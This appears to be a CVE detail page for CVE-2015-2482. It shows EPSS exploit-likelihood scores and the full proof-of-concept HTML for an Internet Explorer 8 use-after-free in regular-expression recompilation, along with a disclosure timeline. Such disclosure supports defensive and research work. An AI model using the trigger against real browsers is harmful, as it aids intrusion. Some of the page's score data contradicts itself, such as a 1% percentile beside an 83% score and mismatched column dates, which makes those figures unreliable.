CVE-2015-2482 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	83.1%	–	–
2022-04-17	–	–	79.48%	–	–
2023-03-12	–	–	–	96.05%	–
2023-03-26	–	–	–	95.35%	–
2023-04-30	–	–	–	94.3%	–
2023-06-04	–	–	–	94.22%	–
2023-11-12	–	–	–	94.05%	–
2024-06-02	–	–	–	94.05%	–
2024-06-23	–	–	–	94.17%	–
2024-08-04	–	–	–	94.42%	–
2024-11-10	–	–	–	94.67%	–
2024-12-22	–	–	–	89.23%	–
2025-01-19	–	–	–	89.23%	–
2025-03-18	–	–	–	–	56.16%
2025-03-18	–	–	–	–	56.16,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	1%
2022-04-17	99%
2023-03-12	99%
2023-03-26	99%
2023-04-30	99%
2023-06-04	99%
2023-11-12	99%
2024-06-02	99%
2024-06-23	99%
2024-08-04	99%
2024-11-10	99%
2024-12-22	99%
2025-01-19	99%
2025-03-18	98%
2025-03-18	98%

<!-- Source: http://blog.skylined.nl/20161116001.html Synopsis A specially crafted web-page can cause the Javascript engine of Microsoft Internet Explorer 8 to free memory used for a string. The code will keep a reference to the string and can be forced to reuse it when compiling a regular expression. Known affected software, attack vectors and mitigations Microsoft Internet Explorer 8 An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path. --> <!DOCTYPE html> <html> <script> // This Po­C attempts to exploit a use-after-free bug in Microsoft Internet // Explorer 8. // See http://blog.skylined.nl/20161116001.html for details. var r=new Reg­Exp("A|x|x|xx|xxxxxxxxxxxxxxxxxxxx+", "g"); "A".replace(r, function (){ // Force OLEAUT32 to free the string for (var j = 0; j < 16; j++) new Array(0x1000).join("B"); // Reuse the freed memory r.compile(); }); // This work by Sky­Lined is licensed under a Creative Commons // Attribution-Non-Commercial 4.0 International License. </script> </html> <!-- Description Recompiling the regular expression pattern during a replace can cause the code to reuse a freed string, but only if the string is freed from the cache by allocating and freeing a number of strings of certain size, as explained by Alexander Sotirov in his Heap Feng-Shui presentation. Exploit Exploitation was not investigated. Time-line March 2015: This vulnerability was found through fuzzing. March 2015: This vulnerability was submitted to ZDI. April 2015: This vulnerability was acquired by ZDI. October 2015: Microsoft addressed this issue in MS15-018. November 2016: Details of this issue are released. -->